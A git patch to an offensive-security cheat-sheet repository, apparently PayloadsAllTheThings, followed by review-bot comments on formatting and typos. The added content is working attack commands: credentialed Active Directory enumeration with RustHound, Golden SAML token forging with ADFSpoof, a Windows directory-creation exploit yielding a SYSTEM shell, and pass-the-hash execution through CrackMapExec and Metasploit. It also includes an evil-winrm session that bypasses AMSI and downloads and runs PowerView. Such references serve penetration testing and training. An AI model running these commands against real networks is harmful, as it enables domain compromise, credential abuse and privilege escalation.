From 5190829ab4b55cf2b98c29fc5bf2d4e65ac9d798 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Fri, 30 Dec 2022 11:01:31 +0100 Subject: [PATCH] RustHound Examples --- .../Active Directory Attack.md | 32 +++++++++++++------ .../Windows - Privilege Escalation.md | 13 +++++++- .../Windows - Using credentials.md | 25 ++++++++------- 3 files changed, 48 insertions(+), 22 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 4f3f119..a1f1f24 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -228,10 +228,11 @@ Use the correct collector * AzureHound for Azure Active Directory * SharpHound for local Active Directory +* RustHound for local Active Directory -* use [AzureHound](https://github.com/BloodHoundAD/AzureHound) (more info: [Cloud - Azure Pentest](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20Azure%20Pentest.md#azure-recon-tools)) +* use [BloodHoundAD/AzureHound](https://github.com/BloodHoundAD/AzureHound) (more info: [Cloud - Azure Pentest](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20Azure%20Pentest.md#azure-recon-tools)) -* use [BloodHound](https://github.com/BloodHoundAD/BloodHound) +* use [BloodHoundAD/BloodHound](https://github.com/BloodHoundAD/BloodHound) ```powershell # run the collector on the machine using SharpHound.exe # https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.exe 
@@ -266,6 +267,15 @@ Use the correct collector certipy find 'corp.local/john:Passw0rd@dc.corp.local' -old-bloodhound certipy find 'corp.local/john:Passw0rd@dc.corp.local' -vulnerable -hide-admins -username user@domain -password Password123 ``` +* use [OPENCYBER-FR/RustHound](https://github.com/OPENCYBER-FR/RustHound) + ```ps1 + # Windows with GSSAPI session + rusthound.exe -d domain.local --ldapfqdn domain + # Windows/Linux simple bind connection username:password + rusthound.exe -d domain.local -u user@domain.local -p Password123 -o output -z + # Linux with username:password and ADCS module for @ly4k BloodHound version + rusthound -d domain.local -u 'user@domain.local' -p 'Password123' -o /tmp/adcs --adcs -z + ``` Then import the zip/json files into the Neo4J database and query them. @@ -2683,20 +2693,20 @@ Exploitation: #### ADFS - Golden SAML -Requirements: +**Requirements**: * ADFS service account * The private key (PFX with the decryption password) -Exploit: -* Use [mandiant/ADFSDump](https://github.com/mandiant/ADFSDump) to dump ADFS informations -* Convert PFX and Private key to binary format +**Exploitation**: +* Run [mandiant/ADFSDump](https://github.com/mandiant/ADFSDump) on AD FS server as the AD FS service account. It will query the Windows Internal Database (WID): `\\.\pipe\MICROSOFT##WID\tsql\query` +* Convert PFX and Private Key to binary format ```ps1 # For the pfx echo AAAAAQAAAAAEE[...]Qla6 | base64 -d > EncryptedPfx.bin # For the private key echo f7404c7f[...]aabd8b | xxd -r -p > dkmKey.bin ``` -* Create the Golden SAML using [mandiant/ADFSpoof](https://github.com/mandiant/ADFSpoof) +* Create the Golden SAML using [mandiant/ADFSpoof](https://github.com/mandiant/ADFSpoof), you might need to update the [dependencies](https://github.com/szymex73/ADFSpoof). ```ps1 mkdir ADFSpoofTools cd $_ 
@@ -2711,10 +2721,13 @@ Exploit: pip install -e . cd ../ADFSpoof pip install -r requirements.txt - python ADFSpoof.py -b EncryptedPfx.bin DkmKey.bin -s adfs.pentest.lab saml2 --endpoint https://www.contoso.com/adfs/ls + python ADFSpoof.py -b EncryptedPfx.bin DkmKey.bin -s adfs.pentest.lab saml2 --endpoint https://www.contoso.com/adfs/ls /SamlResponseServlet --nameidformat urn:oasis:names:tc:SAML:2.0:nameid-format:transient --nameid 'PENTEST\administrator' --rpidentifier Supervision --assertions 'PENTEST\administrator' ``` +Other interesting tools to exploit AD FS: +* [WhiskeySAML](https://github.com/secureworks/whiskeysamlandfriends/tree/main/whiskeysaml) + ### UnPAC The Hash @@ -4133,4 +4146,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae * [Exploring SCCM by Unobfuscating Network Access Accounts - @_xpn_ - Posted on 2022-07-09](https://blog.xpnsec.com/unobfuscating-network-access-accounts/) * [.NET Advanced Code Auditing XmlSerializer Deserialization Vulnerability - April 2, 2019 by znlive](https://znlive.com/xmlserializer-deserialization-vulnerability) * [Practical guide for Golden SAML - Practical guide step by step to create golden SAML](https://nodauf.dev/p/practical-guide-for-golden-saml/) -* [Relaying to AD Certificate Services over RPC - NOVEMBER 16, 2022 - SYLVAIN HEINIGER](https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-services-over-rpc/) \ No newline at end of file +* [Relaying to AD Certificate Services over RPC - NOVEMBER 16, 2022 - SYLVAIN HEINIGER](https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-services-over-rpc/) +* [I AM AD FS AND SO CAN YOU - Douglas Bienstock & Austin Baker - Mandiant](https://troopers.de/downloads/troopers19/TROOPERS19_AD_AD_FS.pdf) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 8e907f5..965efc3 100644 
--- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -55,6 +55,7 @@ * [DiagHub](#diaghub) * [UsoDLLLoader](#usodllloader) * [WerTrigger](#wertrigger) + * [WerMgr](#wermgr) * [EoP - Common Vulnerabilities and Exposures](#eop---common-vulnerabilities-and-exposure) * [MS08-067 (NetAPI)](#ms08-067-netapi) * [MS10-015 (KiTrap0D)](#ms10-015-kitrap0d---microsoft-windows-nt2000--2003--2008--xp--vista--7) @@ -1359,7 +1360,7 @@ If we found a privileged file write vulnerability in Windows or in some third-pa ### WerTrigger -> Weaponizing for privileged file writes bugs with Windows problem reporting +> Exploit Privileged File Writes bugs with Windows Problem Reporting 1. Clone https://github.com/sailay1996/WerTrigger 2. Copy `phoneinfo.dll` to `C:\Windows\System32\` @@ -1367,6 +1368,16 @@ If we found a privileged file write vulnerability in Windows or in some third-pa 4. Then, run `WerTrigger.exe`. 5. Enjoy a shell as **NT AUTHORITY\SYSTEM** +### WerMgr + +> Exploit Privileged Directory Creation Bugs with Windows Error Reporting + +1. Clone https://github.com/binderlabs/DirCreate2System +2. Create directory `C:\Windows\System32\wermgr.exe.local\` +3. Grant access to it: `cacls C:\Windows\System32\wermgr.exe.local /e /g everyone:f` +4. Place `spawn.dll` file and `dircreate2system.exe` in a same directory and run `.\dircreate2system.exe`. +5. Enjoy a shell as **NT AUTHORITY\SYSTEM** + ## EoP - Common Vulnerabilities and Exposure diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md index a2abf5a..9174183 100644 --- a/Methodology and Resources/Windows - Using credentials.md +++ b/Methodology and Resources/Windows - Using credentials.md 
@@ -105,7 +105,7 @@ use exploit/windows/smb/psexec set RHOST 10.2.0.3 set SMBUser username set SMBPass password -set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c +set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 set PAYLOAD windows/meterpreter/bind_tcp run shell 
@@ -115,25 +115,26 @@ shell ```powershell root@payload$ git clone https://github.com/byt3bl33d3r/CrackMapExec.github -root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" -x 'whoami' # cmd -root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" -X 'whoami' # powershell -root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" --exec-method atexec -x 'whoami' -root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" --exec-method wmiexec -x 'whoami' -root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -x 'whoami' +root@payload$ cme smb 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0" -x 'whoami' # cmd +root@payload$ cme smb 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0" -X 'whoami' # powershell +root@payload$ cme smb 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0" --exec-method atexec -x 'whoami' +root@payload$ cme smb 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0" --exec-method wmiexec -x 'whoami' +root@payload$ cme smb 192.168.1.100 -u Administrator -H ":31d6cfe0d16ae931b73c59d7e0c089c0" --exec-method smbexec -x 'whoami' ``` ## WinRM -Require: +**Requirements**: * Port **5985** or **5986** open. * Default endpoint is **/wsman** +If WinRM is disabled on the system you can enable it using: `winrm quickconfig` + ```powershell -root@payload$ git clone https://github.com/Hackplayers/evil-winrm -root@payload$ evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM] -root@payload$ ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' 
-s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/' -root@payload$ ruby evil-winrm.rb -i 10.0.0.20 -u username -H BD1C6503987F8FF006296118F359FA79 -root@payload$ ruby evil-winrm.rb -i 10.0.0.20 -u username -p password -r domain.local +git clone https://github.com/Hackplayers/evil-winrm +evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM] +evil-winrm -i 10.0.0.20 -u username -H HASH +evil-winrm -i 10.0.0.20 -u username -p password -r domain.local *Evil-WinRM* PS > Bypass-4MSI *Evil-WinRM* PS > IEX([Net.Webclient]::new().DownloadString("http://127.0.0.1/PowerView.ps1"))
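Review bot: in the `@@ -266,6 +267,15 @@` hunk of `Active Directory Attack.md`, the new RustHound block is fenced as `ps1` but its last example (`rusthound -d domain.local ... --adcs -z`) is the Linux binary, and the first example passes `--ldapfqdn domain` with no hint of what that value should be. Suggest a neutral fence (the commands are plain command lines, not PowerShell) or separate Windows/Linux fences, one comment per line stating what `--ldapfqdn` expects, and a link to the BloodHound fork that the "@ly4k BloodHound version" comment refers to so readers know which UI consumes the `--adcs` output.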
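Review bot: in the `@@ -2683,20 +2693,20 @@` hunk, "on AD FS server" should read "on the AD FS server", and the link text "dependencies" is misleading because the URL points at a fork of ADFSpoof rather than a dependency list; say "you may need the updated fork at ..." instead. The `base64 -d` / `xxd -r -p` commands in the `ps1` fence are Linux tools, so the fence tag does not match the commands; mark the conversion step as run on the attacker's Linux host.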
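Review bot: in the `@@ -2711,10 +2721,13 @@` hunk, the `python ADFSpoof.py ...` invocation is broken across two lines with no continuation: `--endpoint https://www.contoso.com/adfs/ls` ends one line and `/SamlResponseServlet --nameidformat ...` starts the next, so a copy-paste would run the second half as a separate command and the endpoint would be truncated. Join it onto one line or end the first with `\`. The key file is also written as `dkmKey.bin` in the previous hunk but read as `DkmKey.bin` here; on a case-sensitive filesystem the command will fail, so use one spelling.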
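Review bot: in the `@@ -4133,4 +4146,5 @@` hunk, the new reference line still carries `\ No newline at end of file`; add the trailing newline so the next reference appended here does not produce the same noise in the diff.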
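Review bot: in the `@@ -1367,6 +1368,16 @@` hunk of `Windows - Privilege Escalation.md`, the new WerMgr steps never say how creating `C:\Windows\System32\wermgr.exe.local\` leads to `spawn.dll` being loaded, so a reader cannot tell which step exercises the "privileged directory creation" primitive named in the heading; one sentence on the mechanism would make the section self-explanatory. Step 4 should read "in the same directory", and step 3 uses the deprecated `cacls`; the `icacls` equivalent (`icacls C:\Windows\System32\wermgr.exe.local /grant Everyone:F`) is the current tool. It is also worth noting that step 3 leaves a world-writable directory under `System32`, which is exactly the kind of artifact defenders watch for.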
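Review bot: in the `@@ -105,7 +105,7 @@` hunk of `Windows - Using credentials.md`, `set SMBPass password` is immediately followed by `set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0`, so the second assignment silently overrides the first; show them as alternatives (comment one out, or annotate the second with `# or LM:NT hash for pass-the-hash`). The new value is the well-known LM:NT pair of an empty password, which is fine as a placeholder but should be labelled as one so it is not mistaken for a working credential.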
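Review bot: in the `@@ -115,25 +115,26 @@` hunk, the added line "If WinRM is disabled on the system you can enable it using: `winrm quickconfig`" should say that the command runs on the target host from an elevated prompt, otherwise it reads as something done from the attacker's machine. The context line `git clone https://github.com/byt3bl33d3r/CrackMapExec.github` looks like a typo for `.git` and could be fixed while this block is being touched. As in the psexec hunk, the `-H ":31d6cfe0d16ae931b73c59d7e0c089c0"` value is the empty-password NT hash; a `# placeholder hash` comment on the first occurrence would avoid confusion.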